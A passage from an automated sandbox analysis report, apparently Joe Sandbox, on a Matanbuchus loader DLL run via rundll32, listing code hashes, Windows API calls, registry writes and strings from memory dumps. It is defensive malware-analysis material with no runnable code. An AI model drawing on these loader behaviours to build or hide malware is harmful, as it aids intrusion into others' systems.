                          • Opcode ID: 743f8f6ed7d3dafc849b8407b333ca00744b702c402de91a5cb1d0c5c83d8951
                          • Instruction ID: 2a67d21c45633d3dd0a6cc9b9bd6b223c38913d778bdb96c5192a158bd89e57c
                          • Opcode Fuzzy Hash: 743f8f6ed7d3dafc849b8407b333ca00744b702c402de91a5cb1d0c5c83d8951
                          • Instruction Fuzzy Hash: C1E08C32915228EBCB10EB88C92098AF3FCFB44B14B114497F502D3510C2B0EE00C7C4
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b71919ba0385f4a8fc00f2e514dbeba694445a5405f75bd256c70b69ca15c05e
                          • Instruction ID: d0b7384478303b55c0f299950ef720c756c45a05838bf33a8e3550d5465ff443
                          • Opcode Fuzzy Hash: b71919ba0385f4a8fc00f2e514dbeba694445a5405f75bd256c70b69ca15c05e
                          • Instruction Fuzzy Hash: 8BC08C3C002984C7CE06991082B0BB733BAB3A1786F8048AEC43B0BF41C51FA882DB02
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 517683b43767a3535c157b2b51665dec237b95770994ae3f6177b6cbaedc1245
                          • Instruction ID: 7cacbbe88ecc4cab0eaef6d20cf23e499f9f73f380761552353fd898b1fb0951
                          • Opcode Fuzzy Hash: 517683b43767a3535c157b2b51665dec237b95770994ae3f6177b6cbaedc1245
                          • Instruction Fuzzy Hash: 14D0127490560CEBC704CF49D540959F7F8EB48650F208199EC0C83700D632AE01CA80
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
                          • Instruction ID: 0230c4de2727f5ca7c94c7bd14938b1f1fc6463ea35c1893f292ab52552c7abd
                          • Opcode Fuzzy Hash: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
                          • Instruction Fuzzy Hash: 8CB011322A2B88CBC202CA8CE080E80B3ECE308E20F0000A0E80883B22C228FC00C880
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210625828.000000006CC51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CC50000, based on PE: true
                          • Associated: 00000003.00000002.2210605097.000000006CC50000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210655307.000000006CC83000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210672778.000000006CC91000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210777648.000000006CF27000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210910682.000000006D0F9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210926789.000000006D0FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6cc50000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
                          • Instruction ID: be7eecee3400b42b3e558a840de4aeb97e4223185f45bdd8b65d759b642826a8
                          • Opcode Fuzzy Hash: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
                          • Instruction Fuzzy Hash: 85A002321A5B8CC7C612A68DA651B51B3ECE348D54F440461A50D43E015659B9108495

                          Control-flow Graph (legend: Executed / Not Executed)
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7EF5B9C4
                          • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7EF5B9E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Module$FileHandleName
                          • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
                          • API String ID: 4146042529-3261600717
                          • Opcode ID: 0d4d98cd37def54295d9cdee24e6c03657d92c3c17ac60fc2ac1e166f55ee552
                          • Instruction ID: d63dcf6929a0f8b57e8b3382425876ea34ef9e8772f7e71f3fe0feffc698c885
                          • Opcode Fuzzy Hash: 0d4d98cd37def54295d9cdee24e6c03657d92c3c17ac60fc2ac1e166f55ee552
                          • Instruction Fuzzy Hash: C6C1F579A0421AE7D7115F35DC68FEB72B9FFB6300F4405A9EC0696B09F7309B418AA1
                          APIs
                          Strings
                          • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EEFC52E, 7EEFC6D4
                          • x < 0 and x < (std::numeric_limits<number_integer_t>::max)(), xrefs: 7EEFC533
                          • @, xrefs: 7EEFC6BD
                          • d, xrefs: 7EEFC64C
                          • d, xrefs: 7EEFC590
                          • n_chars < number_buffer.size() - 1, xrefs: 7EEFC6D9
                          • d, xrefs: 7EEFC6F5
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aullrem
                          • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$n_chars < number_buffer.size() - 1$x < 0 and x < (std::numeric_limits<number_integer_t>::max)()
                          • API String ID: 3758378126-3644039597
                          • Opcode ID: 72da584f11b19baedfd5b60637f00687bd2897d844e70a729d49afb1343e9fa3
                          • Instruction ID: 837052506fa017048f2ca687dda0c53a1a07502d98546946238fa1cf16d804f3
                          • Opcode Fuzzy Hash: 72da584f11b19baedfd5b60637f00687bd2897d844e70a729d49afb1343e9fa3
                          • Instruction Fuzzy Hash: D2F1E678D04219DFDB54CF98D890BDDBBB1BF48304F20899AD91AAB344D774AA84CF58
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv__aullrem
                          • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
                          • API String ID: 3839614884-178659603
                          • Opcode ID: 76485794fe378e16f755cc8fc7505b49c29ed9c8ba3cfd9c271306e32f61e2c1
                          • Instruction ID: bf123b19c28a0088d57a1ac222e04d412cc47e16a02ef57926911f2641264482
                          • Opcode Fuzzy Hash: 76485794fe378e16f755cc8fc7505b49c29ed9c8ba3cfd9c271306e32f61e2c1
                          • Instruction Fuzzy Hash: 82E1C278E04619DFDB54CF99C890B9DBBB1FF48304F2089AAD91AA7354D7306A84CF58
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,?,00000044,00000000), ref: 7EF4BB99
                          • wsprintfW.USER32 ref: 7EF4BBE6
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7EF4BC03
                          • RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,00000000), ref: 7EF4BC24
                          • RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7EF4BC44
                          • RegCloseKey.ADVAPI32(00000000), ref: 7EF4BC5D
                          • RegCloseKey.ADVAPI32(00000000), ref: 7EF4BC68
                            • Part of subcall function 7EF4C347: GetTickCount.KERNEL32 ref: 7EF4C365
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseValue$CountCreateOpenTickwsprintf
                          • String ID: %s_%x%x$SOFTWARE$bbb$kkk
                          • API String ID: 730945307-550109914
                          • Opcode ID: 629fcc265edaf9851974d062c0db92ff8cd3fd3019f2b477db10ae18aac13710
                          • Instruction ID: 6950d697c736b3f3d4b59ae3cc6898374590dc3d3f5e5d3901bb36dddff8f5c4
                          • Opcode Fuzzy Hash: 629fcc265edaf9851974d062c0db92ff8cd3fd3019f2b477db10ae18aac13710
                          • Instruction Fuzzy Hash: D3316976A00219FAEB119B95CC99FEFBFBDEF09354F400465F609A6460D7309B84DBA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$M_plus.e <= kGamma$M_plus.e >= kAlpha$d$d$d <= 9$p1 > 0$p2 <= (std::numeric_limits<std::uint64_t>::max)() / 10$p2 > delta
                          • API String ID: 0-2564281896
                          • Opcode ID: cee6bd289ccce299ff2a9978b71f0a39b419d15746211754a42a0716db219aa8
                          • Instruction ID: d9f0b16915812262a5697407f63fe3cb5ffcf8fc733efbe1d5d0ec0830061b1f
                          • Opcode Fuzzy Hash: cee6bd289ccce299ff2a9978b71f0a39b419d15746211754a42a0716db219aa8
                          • Instruction Fuzzy Hash: AAF10C79E04208EFDB04CF98D8A1ADDBBB2FF48304F60855AE919AB744D7346A41CF55
                          APIs
                          • GetCurrentProcess.KERNEL32(?), ref: 7EF4BDA9
                          • IsWow64Process.KERNEL32(00000000), ref: 7EF4BDB0
                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7EF4BDEC
                          • wsprintfW.USER32 ref: 7EF4BE7A
                          • CloseHandle.KERNEL32(00000000), ref: 7EF4C005
                          • CloseHandle.KERNEL32(00000000), ref: 7EF4C010
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
                          • String ID: 0x%x$?
                          • API String ID: 3386633596-4137330559
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210625828.000000006CC51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CC50000, based on PE: true
                          • Associated: 00000003.00000002.2210605097.000000006CC50000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2210655307.000000006CC83000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2210672778.000000006CC91000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2210777648.000000006CF27000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2210910682.000000006D0F9000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2210926789.000000006D0FB000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6cc50000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID: D__ExceptionPtrCopy$K$Request for author$nv$|
                          • API String ID: 0-2977880545
                          APIs
                          • type_info::operator==.LIBVCRUNTIME ref: 7EF50F30
                          • ___TypeMatch.LIBVCRUNTIME ref: 7EF5103E
                          • _UnwindNestedFrames.LIBCMT ref: 7EF51190
                          • CallUnexpected.LIBVCRUNTIME ref: 7EF511AB
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 2751267872-393685449
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6CC784B7
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6CC784BF
                          • _ValidateLocalCookies.LIBCMT ref: 6CC78548
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6CC78573
                          • _ValidateLocalCookies.LIBCMT ref: 6CC785C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210625828.000000006CC51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CC50000, based on PE: true
                          • Associated: 00000003.00000002.2210605097.000000006CC50000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2210655307.000000006CC83000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2210672778.000000006CC91000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2210777648.000000006CF27000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2210910682.000000006D0F9000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2210926789.000000006D0FB000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6cc50000_rundll32.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 1170836740-3733052814
                          APIs
                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,7EF6CBBF), ref: 7EF6D26C
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer
                          • String ID: acos$asin$log$log10$pow$sqrt
                          • API String ID: 3527080286-3190521889
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: S$lqmqxj3IPM1//0.$w$}
                          • API String ID: 0-71832097
                          APIs
                          • __RTC_Initialize.LIBCMT ref: 7EF4DBA6
                          • ___scrt_uninitialize_crt.LIBCMT ref: 7EF4DBC0
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Initialize___scrt_uninitialize_crt
                          • String ID:
                          • API String ID: 2442719207-0
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 7EF50877
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 7EF5087F
                          • _ValidateLocalCookies.LIBCMT ref: 7EF50908
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 7EF50933
                          • _ValidateLocalCookies.LIBCMT ref: 7EF50988
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          APIs
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7EF412DF
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7EF412F9
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7EF41313
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7EF4132D
                          Strings
                          • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EF41349
                          • false, xrefs: 7EF4134E
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::bad_exception::bad_exception
                          • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                          • API String ID: 2160870905-4036550669
                          APIs
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7EF413FF
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7EF41419
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7EF41433
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7EF4144D
                          Strings
                          • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EF41469
                          • false, xrefs: 7EF4146E
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::bad_exception::bad_exception
                          • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                          • API String ID: 2160870905-4036550669
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,7EF60DA9,7EF5DD78,0000000C,7EF72040,00000000,00000000,?,7EF60FF6,00000021,FlsSetValue,7EF7A8C0,7EF7A8C8,7EF72040), ref: 7EF60D5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 7EF4D185
                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 7EF4D1F0
                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7EF4D20D
                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 7EF4D24C
                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7EF4D2AB
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 7EF4D2CE
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiStringWide
                          • String ID:
                          • API String ID: 2829165498-0
                          APIs
                          • GetLastError.KERNEL32(00000001,?,7EF509C2,7EF4D53B,7EF4DA30,?,7EF4DC68,?,00000001,?,?,00000001,?,7EF82608,0000000C,7EF4DD61), ref: 7EF50AB1
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 7EF50ABF
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 7EF50AD8
                          • SetLastError.KERNEL32(00000000,7EF4DC68,?,00000001,?,?,00000001,?,7EF82608,0000000C,7EF4DD61,?,00000001,?), ref: 7EF50B2A
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          APIs
                          • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7EF5BED5
                          • GetFileType.KERNEL32(00000000,?,00003C16), ref: 7EF5BEE7
                          • swprintf.LIBCMT ref: 7EF5BF08
                          • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7EF5BF45
                          Strings
                          • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7EF5BEFD
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ConsoleFileHandleTypeWriteswprintf
                          • String ID: Assertion failed: %Ts, file %Ts, line %d
                          • API String ID: 2943507729-1719349581
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,1B62296B,7EF72040,?,00000000,7EF70873,000000FF,?,7EF5D3EA,7D83FC4D,?,7EF5D3BE,7EF72040), ref: 7EF5D48F
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 7EF5D4A1
                          • FreeLibrary.KERNEL32(00000000,?,00000000,7EF70873,000000FF,?,7EF5D3EA,7D83FC4D,?,7EF5D3BE,7EF72040), ref: 7EF5D4C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7EF05AC7
                          • int.LIBCPMTD ref: 7EF05AE0
                            • Part of subcall function 7EF0AD10: std::_Lockit::_Lockit.LIBCPMT ref: 7EF0AD26
                            • Part of subcall function 7EF0AD10: std::_Lockit::~_Lockit.LIBCPMT ref: 7EF0AD50
                          • Concurrency::cancel_current_task.LIBCPMTD ref: 7EF05B27
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7EF05BBB
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 3053331623-0
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7EF05C07
                          • int.LIBCPMTD ref: 7EF05C20
                            • Part of subcall function 7EF0AD10: std::_Lockit::_Lockit.LIBCPMT ref: 7EF0AD26
                            • Part of subcall function 7EF0AD10: std::_Lockit::~_Lockit.LIBCPMT ref: 7EF0AD50
                          • Concurrency::cancel_current_task.LIBCPMTD ref: 7EF05C67
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7EF05CFB
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 3053331623-0
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7EF05987
                          • int.LIBCPMTD ref: 7EF059A0
                            • Part of subcall function 7EF0AD10: std::_Lockit::_Lockit.LIBCPMT ref: 7EF0AD26
                            • Part of subcall function 7EF0AD10: std::_Lockit::~_Lockit.LIBCPMT ref: 7EF0AD50
                          • Concurrency::cancel_current_task.LIBCPMTD ref: 7EF059E7
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7EF05A7B
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 3053331623-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: dllmain_raw$dllmain_crt_dispatch
                          • String ID:
                          • API String ID: 3136044242-0
                          APIs
                          • __EH_prolog3.LIBCMT ref: 7EF4CA0B
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7EF4CA16
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7EF4CA84
                            • Part of subcall function 7EF4CB67: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7EF4CB7F
                          • std::locale::_Setgloballocale.LIBCPMT ref: 7EF4CA31
                          • _Yarn.LIBCPMT ref: 7EF4CA47
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                          • String ID:
                          • API String ID: 1088826258-0
                          APIs
                          • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,7EF1D366), ref: 7EF4C055
                          • CloseHandle.KERNEL32(7EF1D366), ref: 7EF4C0FF
                          • CloseHandle.KERNEL32(?), ref: 7EF4C109
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CreateProcess
                          • String ID: ?
                          • API String ID: 2922976086-1684325040
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,7EF51BA3,00000000,?,00000001,?,?,?,7EF51C92,00000001,FlsFree,7EF77E5C,FlsFree), ref: 7EF51BFF
                          • GetLastError.KERNEL32(?,7EF51BA3,00000000,?,00000001,?,?,?,7EF51C92,00000001,FlsFree,7EF77E5C,FlsFree,00000000,?,7EF50BAF), ref: 7EF51C09
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 7EF51C31
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID: api-ms-
                          • API String ID: 3177248105-2084034818
